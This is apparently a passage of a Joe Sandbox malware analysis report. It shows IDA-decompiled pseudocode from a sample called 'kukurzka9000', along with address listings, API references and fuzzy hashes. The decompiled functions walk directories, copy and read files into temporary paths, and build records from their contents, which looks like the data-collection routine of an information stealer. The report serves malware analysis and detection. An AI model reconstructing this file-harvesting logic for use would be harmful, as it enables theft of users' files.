                                                                                                                                                                        0x00403d9b
                                                                                                                                                                        0x00403da6
                                                                                                                                                                        0x00403dac
                                                                                                                                                                        0x00403db3
                                                                                                                                                                        0x00403db5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403dc8
                                                                                                                                                                        0x00403dd7
                                                                                                                                                                        0x00403de4
                                                                                                                                                                        0x00403ded
                                                                                                                                                                        0x00403df2
                                                                                                                                                                        0x00403dfa
                                                                                                                                                                        0x00403e0d
                                                                                                                                                                        0x00403e12
                                                                                                                                                                        0x00403e14
                                                                                                                                                                        0x00403e17
                                                                                                                                                                        0x00403e1a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403e20
                                                                                                                                                                        0x00403e20
                                                                                                                                                                        0x00403e20
                                                                                                                                                                        0x00403e27
                                                                                                                                                                        0x00403e2d
                                                                                                                                                                        0x00403e35
                                                                                                                                                                        0x00403e4a
                                                                                                                                                                        0x00403e4c
                                                                                                                                                                        0x00403e4e
                                                                                                                                                                        0x00403e60
                                                                                                                                                                        0x00403e74
                                                                                                                                                                        0x00403e7b
                                                                                                                                                                        0x00403e7e
                                                                                                                                                                        0x00403e82
                                                                                                                                                                        0x00403e89
                                                                                                                                                                        0x00403e89
                                                                                                                                                                        0x00403e8f
                                                                                                                                                                        0x00403e9a
                                                                                                                                                                        0x00403ea9
                                                                                                                                                                        0x00403eac
                                                                                                                                                                        0x00403eae
                                                                                                                                                                        0x00403eb5
                                                                                                                                                                        0x00403ed1
                                                                                                                                                                        0x00403eda
                                                                                                                                                                        0x00403edf
                                                                                                                                                                        0x00403ee3
                                                                                                                                                                        0x00403eec
                                                                                                                                                                        0x00403ef2
                                                                                                                                                                        0x00403ef2
                                                                                                                                                                        0x00403e4e
                                                                                                                                                                        0x00403e35
                                                                                                                                                                        0x00403f02
                                                                                                                                                                        0x00403f04
                                                                                                                                                                        0x00403f04
                                                                                                                                                                        0x00403f0d
                                                                                                                                                                        0x00403f16
                                                                                                                                                                        0x00403f1f
                                                                                                                                                                        0x00403f28
                                                                                                                                                                        0x00403f31
                                                                                                                                                                        0x00403f3a
                                                                                                                                                                        0x00403f4f
                                                                                                                                                                        0x00403f4f
                                                                                                                                                                        0x00403f53
                                                                                                                                                                        0x00403f53
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403CF0
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D0A
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D25
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 3494564517-1731603023
                                                                                                                                                                        • Opcode ID: 8a6da0735ee3c45563ce6ef7da6886ff2a780dc9bc9fef783d63b4fc9ada9af1
                                                                                                                                                                        • Instruction ID: 30a2a756aa81b8726d571d7f3e9c3124e2b02b732ad4ca54e9afcb5ed5404845
                                                                                                                                                                        • Opcode Fuzzy Hash: 8a6da0735ee3c45563ce6ef7da6886ff2a780dc9bc9fef783d63b4fc9ada9af1
                                                                                                                                                                        • Instruction Fuzzy Hash: CC91B571A00215AFDF089FA5DD49DAE7BB9EB48310F004839F905B73A0DB746D21CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E004039D7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				void* _v56;
                                                                                                                                                                        				char _v608;
                                                                                                                                                                        				signed char _v652;
                                                                                                                                                                        				void* _t47;
                                                                                                                                                                        				void* _t50;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t68;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				void* _t72;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t80;
                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				intOrPtr _t129;
                                                                                                                                                                        				intOrPtr _t132;
                                                                                                                                                                        				intOrPtr _t133;
                                                                                                                                                                        				intOrPtr _t135;
                                                                                                                                                                        				intOrPtr _t137;
                                                                                                                                                                        				intOrPtr _t139;
                                                                                                                                                                        				void* _t143;
                                                                                                                                                                        				DWORD* _t144;
                                                                                                                                                                        				void* _t145;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        
                                                                                                                                                                        				_t101 = __ecx;
                                                                                                                                                                        				_v24 = __edx;
                                                                                                                                                                        				_v40 = __ecx;
                                                                                                                                                                        				_t47 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), __ecx);
                                                                                                                                                                        				_t129 =  *0x40e1d0; // 0x658898
                                                                                                                                                                        				_t143 = E0040A503(_t47, _t129);
                                                                                                                                                                        				_v20 = _t143;
                                                                                                                                                                        				_t50 =  *((intOrPtr*)( *0x40e018))(_t143,  &_v652);
                                                                                                                                                                        				_v16 = _t50;
                                                                                                                                                                        				if(_t50 != 0xffffffff) {
                                                                                                                                                                        					_t144 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						if((_v652 & 0x00000010) != 0) {
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_push(L"..");
                                                                                                                                                                        							_push( &_v608);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e0a0))() == 0) {
                                                                                                                                                                        								goto L11;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t57 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t149 =  *((intOrPtr*)( *0x40e000))(_t57, _t101,  &_v608);
                                                                                                                                                                        								_v36 = _t149;
                                                                                                                                                                        								_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t60 = E0040A69E( *0x40e044,  &_v8);
                                                                                                                                                                        								_t102 = _v8;
                                                                                                                                                                        								if(_t60 == 0) {
                                                                                                                                                                        									L16:
                                                                                                                                                                        									LocalFree(_t102);
                                                                                                                                                                        									LocalFree(_t149);
                                                                                                                                                                        									DeleteFileW(_t102);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_push(_t144);
                                                                                                                                                                        									_push(_t102);
                                                                                                                                                                        									_push(_t149);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        										goto L16;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t68 =  *((intOrPtr*)( *0x40e03c))(_t102, 0x80000000, 1, _t144, 4, _t144, _t144);
                                                                                                                                                                        										_v32 = _t68;
                                                                                                                                                                        										GetFileSize(_t68, _t144);
                                                                                                                                                                        										_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        										_t71 =  *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8);
                                                                                                                                                                        										_t132 =  *0x40e1b4; // 0x62de88
                                                                                                                                                                        										_t72 = E0040A503(_t71, _t132);
                                                                                                                                                                        										_t133 =  *0x40e1b8; // 0x658718
                                                                                                                                                                        										_t74 = E0040A503(E0040A503(_t72, _t133), _v24);
                                                                                                                                                                        										_t135 =  *0x40e1ec; // 0x658938
                                                                                                                                                                        										_t76 = E0040A503(E0040A503(_t74, _t135), _a4);
                                                                                                                                                                        										_t137 =  *0x40e1ec; // 0x658938
                                                                                                                                                                        										_t78 = E0040A503(E0040A503(_t76, _t137), _a8);
                                                                                                                                                                        										_t139 =  *0x40e1b8; // 0x658718
                                                                                                                                                                        										_t80 = E0040A503(E0040A503(_t78, _t139),  &_v608);
                                                                                                                                                                        										_v12 = _t80;
                                                                                                                                                                        										_t81 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, _t144, _t80, 0xffffffff, _t144, _t144, _t144, _t144);
                                                                                                                                                                        										_v28 = _t81;
                                                                                                                                                                        										_t22 = _t81 + 0x40; // 0x40
                                                                                                                                                                        										_t145 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
                                                                                                                                                                        										_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        										_t84 = _v28;
                                                                                                                                                                        										if(_t84 == 0) {
                                                                                                                                                                        											LocalFree(_t145);
                                                                                                                                                                        											LocalFree(_v8);
                                                                                                                                                                        											goto L10;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(_t84);
                                                                                                                                                                        											_push(_t145);
                                                                                                                                                                        											_push(0xffffffff);
                                                                                                                                                                        											_push(_v12);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0xfde9);
                                                                                                                                                                        											if( *((intOrPtr*)( *0x40e0e4))() == 0) {
                                                                                                                                                                        												LocalFree(_v12);
                                                                                                                                                                        												LocalFree(_t145);
                                                                                                                                                                        												LocalFree(_t102);
                                                                                                                                                                        												LocalFree(_t149);
                                                                                                                                                                        												LocalFree(_v8);
                                                                                                                                                                        												break;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_v52 = _v32;
                                                                                                                                                                        												_v56 = _t145;
                                                                                                                                                                        												_t98 =  *((intOrPtr*)( *0x40e13c))(_v8, _t102);
                                                                                                                                                                        												_t126 = _a16;
                                                                                                                                                                        												_v44 = _v44 & 0x00000000;
                                                                                                                                                                        												_v48 = _t98;
                                                                                                                                                                        												 *_t126 =  *_a16 + 1;
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												_t149 = _v36;
                                                                                                                                                                        												L10:
                                                                                                                                                                        												LocalFree(_t102);
                                                                                                                                                                        												LocalFree(_t149);
                                                                                                                                                                        												_t101 = _v40;
                                                                                                                                                                        												_t144 = 0;
                                                                                                                                                                        												goto L11;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						L13:
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        						L11:
                                                                                                                                                                        						_push( &_v652);
                                                                                                                                                                        						_push(_v16);
                                                                                                                                                                        					} while ( *((intOrPtr*)( *0x40e148))() != 0);
                                                                                                                                                                        					FindClose(_v16);
                                                                                                                                                                        					goto L13;
                                                                                                                                                                        				}
                                                                                                                                                                        				L14:
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}













































                                                                                                                                                                        0x004039ed
                                                                                                                                                                        0x004039ef
                                                                                                                                                                        0x004039f4
                                                                                                                                                                        0x004039fd
                                                                                                                                                                        0x00403a02
                                                                                                                                                                        0x00403a15
                                                                                                                                                                        0x00403a1d
                                                                                                                                                                        0x00403a22
                                                                                                                                                                        0x00403a24
                                                                                                                                                                        0x00403a2a
                                                                                                                                                                        0x00403a30
                                                                                                                                                                        0x00403a32
                                                                                                                                                                        0x00403a39
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403a3f
                                                                                                                                                                        0x00403a4a
                                                                                                                                                                        0x00403a4f
                                                                                                                                                                        0x00403a54
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403a5a
                                                                                                                                                                        0x00403a66
                                                                                                                                                                        0x00403a7f
                                                                                                                                                                        0x00403a88
                                                                                                                                                                        0x00403a90
                                                                                                                                                                        0x00403a93
                                                                                                                                                                        0x00403a98
                                                                                                                                                                        0x00403a9d
                                                                                                                                                                        0x00403c78
                                                                                                                                                                        0x00403c79
                                                                                                                                                                        0x00403c80
                                                                                                                                                                        0x00403c87
                                                                                                                                                                        0x00403aa3
                                                                                                                                                                        0x00403aa8
                                                                                                                                                                        0x00403aa9
                                                                                                                                                                        0x00403aaa
                                                                                                                                                                        0x00403aaf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403ab5
                                                                                                                                                                        0x00403ac7
                                                                                                                                                                        0x00403acb
                                                                                                                                                                        0x00403ace
                                                                                                                                                                        0x00403ae1
                                                                                                                                                                        0x00403af0
                                                                                                                                                                        0x00403af2
                                                                                                                                                                        0x00403afa
                                                                                                                                                                        0x00403aff
                                                                                                                                                                        0x00403b11
                                                                                                                                                                        0x00403b16
                                                                                                                                                                        0x00403b28
                                                                                                                                                                        0x00403b2d
                                                                                                                                                                        0x00403b3f
                                                                                                                                                                        0x00403b44
                                                                                                                                                                        0x00403b59
                                                                                                                                                                        0x00403b71
                                                                                                                                                                        0x00403b74
                                                                                                                                                                        0x00403b7c
                                                                                                                                                                        0x00403b7f
                                                                                                                                                                        0x00403b8d
                                                                                                                                                                        0x00403b98
                                                                                                                                                                        0x00403b9b
                                                                                                                                                                        0x00403ba0
                                                                                                                                                                        0x00403bfb
                                                                                                                                                                        0x00403c04
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403ba2
                                                                                                                                                                        0x00403baa
                                                                                                                                                                        0x00403bab
                                                                                                                                                                        0x00403bac
                                                                                                                                                                        0x00403bad
                                                                                                                                                                        0x00403bae
                                                                                                                                                                        0x00403bb0
                                                                                                                                                                        0x00403bb3
                                                                                                                                                                        0x00403bb4
                                                                                                                                                                        0x00403bbd
                                                                                                                                                                        0x00403c52
                                                                                                                                                                        0x00403c59
                                                                                                                                                                        0x00403c60
                                                                                                                                                                        0x00403c67
                                                                                                                                                                        0x00403c70
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403bc3
                                                                                                                                                                        0x00403bca
                                                                                                                                                                        0x00403bd2
                                                                                                                                                                        0x00403bd5
                                                                                                                                                                        0x00403bd7
                                                                                                                                                                        0x00403bdd
                                                                                                                                                                        0x00403be1
                                                                                                                                                                        0x00403bef
                                                                                                                                                                        0x00403bf1
                                                                                                                                                                        0x00403bf2
                                                                                                                                                                        0x00403bf3
                                                                                                                                                                        0x00403bf4
                                                                                                                                                                        0x00403bf5
                                                                                                                                                                        0x00403c0a
                                                                                                                                                                        0x00403c0b
                                                                                                                                                                        0x00403c12
                                                                                                                                                                        0x00403c18
                                                                                                                                                                        0x00403c1b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403c1b
                                                                                                                                                                        0x00403bbd
                                                                                                                                                                        0x00403ba0
                                                                                                                                                                        0x00403aaf
                                                                                                                                                                        0x00403a9d
                                                                                                                                                                        0x00403a54
                                                                                                                                                                        0x00403c3f
                                                                                                                                                                        0x00403c42
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403c1d
                                                                                                                                                                        0x00403c28
                                                                                                                                                                        0x00403c29
                                                                                                                                                                        0x00403c2e
                                                                                                                                                                        0x00403c39
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403c39
                                                                                                                                                                        0x00403c4a
                                                                                                                                                                        0x00403c4e

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00403ACE
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403BFB
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C04
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C0B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403C12
                                                                                                                                                                        • FindClose.KERNEL32(00000002), ref: 00403C39
                                                                                                                                                                        • LocalFree.KERNEL32(00000002), ref: 00403C42
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C52
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403C59
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C60
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403C67
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C70
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403C79
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403C80
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00403C87
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$Filelstrlen$CloseDeleteFindGlobalSize
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 1958670688-1731603023
                                                                                                                                                                        • Opcode ID: 4caac0c3561e47fa950a7463700a638e5ac742770fbd87cb7ad0bc69e4988ff5
                                                                                                                                                                        • Instruction ID: a054592f1a26ae81db5b8b4afeeb8fb0c3e9f03fa1f4561a45be05a4ad2e9d15
                                                                                                                                                                        • Opcode Fuzzy Hash: 4caac0c3561e47fa950a7463700a638e5ac742770fbd87cb7ad0bc69e4988ff5
                                                                                                                                                                        • Instruction Fuzzy Hash: 64718571A00214AFDB04DFB2DD49EAE77B9EB84310F104939F515B7290DB749D11CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 26%
                                                                                                                                                                        			E004052DA(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                        				char _v576;
                                                                                                                                                                        				char _v584;
                                                                                                                                                                        				char _v616;
                                                                                                                                                                        				signed char _v620;
                                                                                                                                                                        				intOrPtr _v628;
                                                                                                                                                                        				void* _v632;
                                                                                                                                                                        				void* _v648;
                                                                                                                                                                        				intOrPtr _v672;
                                                                                                                                                                        				char _v676;
                                                                                                                                                                        				intOrPtr _v696;
                                                                                                                                                                        				void* _v704;
                                                                                                                                                                        				intOrPtr _v708;
                                                                                                                                                                        				void* _v712;
                                                                                                                                                                        				void* _v720;
                                                                                                                                                                        				void* _v724;
                                                                                                                                                                        				void* _v728;
                                                                                                                                                                        				char _v744;
                                                                                                                                                                        				intOrPtr _v756;
                                                                                                                                                                        				intOrPtr _v768;
                                                                                                                                                                        				void* _v776;
                                                                                                                                                                        				intOrPtr _v784;
                                                                                                                                                                        				signed int _v792;
                                                                                                                                                                        				void* _v796;
                                                                                                                                                                        				void* _v800;
                                                                                                                                                                        				void* _v804;
                                                                                                                                                                        				intOrPtr _v808;
                                                                                                                                                                        				void* _v812;
                                                                                                                                                                        				void* _v828;
                                                                                                                                                                        				void* _v836;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t68;
                                                                                                                                                                        				char _t69;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				void* _t86;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t114;
                                                                                                                                                                        				intOrPtr _t151;
                                                                                                                                                                        				void* _t153;
                                                                                                                                                                        				void* _t154;
                                                                                                                                                                        				void* _t159;
                                                                                                                                                                        				void* _t161;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				void* _t164;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				void* _t168;
                                                                                                                                                                        
                                                                                                                                                                        				_t168 = (_t166 & 0xfffffff8) - 0x284;
                                                                                                                                                                        				_v628 = __edx;
                                                                                                                                                                        				_t62 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t153, _t159, _t112);
                                                                                                                                                                        				_t113 =  *((intOrPtr*)( *0x40e13c))(_t62, __ecx);
                                                                                                                                                                        				_v632 = _t113;
                                                                                                                                                                        				E0040188C(_t113, _t113, 0x104, __ecx,  *0x40e1d0);
                                                                                                                                                                        				_t154 =  *((intOrPtr*)( *0x40e018))(_t113,  &_v616);
                                                                                                                                                                        				_v648 = _t154;
                                                                                                                                                                        				if(_t154 != 0xffffffff) {
                                                                                                                                                                        					_t114 = __ecx;
                                                                                                                                                                        					do {
                                                                                                                                                                        						if((_v620 & 0x00000010) == 0) {
                                                                                                                                                                        							_t68 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        							_t69 =  *((intOrPtr*)( *0x40e000))(_t68, _t114,  &_v584);
                                                                                                                                                                        							_v676 = _t69;
                                                                                                                                                                        							_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        							_t72 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8), _a4);
                                                                                                                                                                        							_v708 = _t72;
                                                                                                                                                                        							_t73 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        							_v708 = _t73;
                                                                                                                                                                        							_t74 =  *((intOrPtr*)( *0x40e08c))(0);
                                                                                                                                                                        							_t161 = _v704;
                                                                                                                                                                        							if(E0040A2AA(_t161 + _t74 * 2,  &_v712, _v696) != 0) {
                                                                                                                                                                        								_t76 = E0040A503(_v720, _v712);
                                                                                                                                                                        								_v720 = _t76;
                                                                                                                                                                        								_v724 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        								if(E0040A69E( *0x40e044,  &_v724) != 0) {
                                                                                                                                                                        									_t164 = _v724;
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_push(_t164);
                                                                                                                                                                        									_push(_v712);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e184))() != 0) {
                                                                                                                                                                        										_v756 =  *((intOrPtr*)( *0x40e03c))(_t164, 0x80000000, 1, 0, 4, 0, 0);
                                                                                                                                                                        										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v768, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        										_v776 = 0;
                                                                                                                                                                        										 *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
                                                                                                                                                                        										_t151 = _v784;
                                                                                                                                                                        										_v804 = 0;
                                                                                                                                                                        										if(_t151 != 0) {
                                                                                                                                                                        											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v808, 0xffffffff, 0, _t151, 0, 0);
                                                                                                                                                                        											if(0 == 0 || E0040A70E( &_v744, _a8) == 0) {
                                                                                                                                                                        												LocalFree(_v836);
                                                                                                                                                                        												CloseHandle(_v828);
                                                                                                                                                                        												DeleteFileW(_t164);
                                                                                                                                                                        												LocalFree(_t164);
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t139 = _a20;
                                                                                                                                                                        												_v792 = _v792 & 0x00000000;
                                                                                                                                                                        												_v804 = _v836;
                                                                                                                                                                        												_v800 = _v828;
                                                                                                                                                                        												_v796 = _t164;
                                                                                                                                                                        												 *_t139 =  *_a20 + 1;
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												_t154 = _v812;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v712);
                                                                                                                                                                        							} else {
                                                                                                                                                                        								LocalFree(_t161);
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v728);
                                                                                                                                                                        							LocalFree(_v720);
                                                                                                                                                                        							L18:
                                                                                                                                                                        							goto L19;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v576 != 0x2e && E0040A70E( &_v576, _a12) == 0) {
                                                                                                                                                                        							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        							_t163 =  *((intOrPtr*)( *0x40e000))(_t86, _t114,  &_v584);
                                                                                                                                                                        							E004052DA(_t163, _v672, _a4, _a8, _a12, _a16, _a20);
                                                                                                                                                                        							_t168 = _t168 + 0x14;
                                                                                                                                                                        							LocalFree(_t163);
                                                                                                                                                                        							goto L18;
                                                                                                                                                                        						}
                                                                                                                                                                        						L19:
                                                                                                                                                                        						_push( &_v676);
                                                                                                                                                                        						_push(_t154);
                                                                                                                                                                        					} while ( *((intOrPtr*)( *0x40e148))() != 0);
                                                                                                                                                                        					LocalFree(_v704);
                                                                                                                                                                        					FindClose(_t154);
                                                                                                                                                                        					goto L21;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					LocalFree(_t113);
                                                                                                                                                                        					L21:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        			}























































                                                                                                                                                                        0x004052e0
                                                                                                                                                                        0x004052f5
                                                                                                                                                                        0x004052fb
                                                                                                                                                                        0x0040530d
                                                                                                                                                                        0x00405316
                                                                                                                                                                        0x0040531a
                                                                                                                                                                        0x0040532d
                                                                                                                                                                        0x0040532f
                                                                                                                                                                        0x00405336
                                                                                                                                                                        0x00405344
                                                                                                                                                                        0x00405346
                                                                                                                                                                        0x0040534b
                                                                                                                                                                        0x004053bb
                                                                                                                                                                        0x004053ca
                                                                                                                                                                        0x004053d9
                                                                                                                                                                        0x004053dd
                                                                                                                                                                        0x004053f3
                                                                                                                                                                        0x00405405
                                                                                                                                                                        0x00405409
                                                                                                                                                                        0x00405417
                                                                                                                                                                        0x0040541b
                                                                                                                                                                        0x0040541d
                                                                                                                                                                        0x00405430
                                                                                                                                                                        0x00405440
                                                                                                                                                                        0x00405452
                                                                                                                                                                        0x0040545c
                                                                                                                                                                        0x00405467
                                                                                                                                                                        0x0040546d
                                                                                                                                                                        0x00405476
                                                                                                                                                                        0x00405478
                                                                                                                                                                        0x00405479
                                                                                                                                                                        0x00405481
                                                                                                                                                                        0x004054a3
                                                                                                                                                                        0x004054b9
                                                                                                                                                                        0x004054c8
                                                                                                                                                                        0x004054cc
                                                                                                                                                                        0x004054ce
                                                                                                                                                                        0x004054d2
                                                                                                                                                                        0x004054d8
                                                                                                                                                                        0x004054f7
                                                                                                                                                                        0x004054fb
                                                                                                                                                                        0x00405549
                                                                                                                                                                        0x00405554
                                                                                                                                                                        0x0040555b
                                                                                                                                                                        0x00405562
                                                                                                                                                                        0x0040550d
                                                                                                                                                                        0x0040550d
                                                                                                                                                                        0x00405514
                                                                                                                                                                        0x00405519
                                                                                                                                                                        0x00405521
                                                                                                                                                                        0x00405530
                                                                                                                                                                        0x00405538
                                                                                                                                                                        0x0040553a
                                                                                                                                                                        0x0040553b
                                                                                                                                                                        0x0040553c
                                                                                                                                                                        0x0040553d
                                                                                                                                                                        0x0040553e
                                                                                                                                                                        0x0040553e
                                                                                                                                                                        0x004054fb
                                                                                                                                                                        0x004054d8
                                                                                                                                                                        0x00405481
                                                                                                                                                                        0x0040556c
                                                                                                                                                                        0x00405432
                                                                                                                                                                        0x0040556c
                                                                                                                                                                        0x0040556c
                                                                                                                                                                        0x00405576
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00405353
                                                                                                                                                                        0x00405379
                                                                                                                                                                        0x00405391
                                                                                                                                                                        0x004053a1
                                                                                                                                                                        0x004053a6
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00405586
                                                                                                                                                                        0x0040558f
                                                                                                                                                                        0x00405590
                                                                                                                                                                        0x00405593
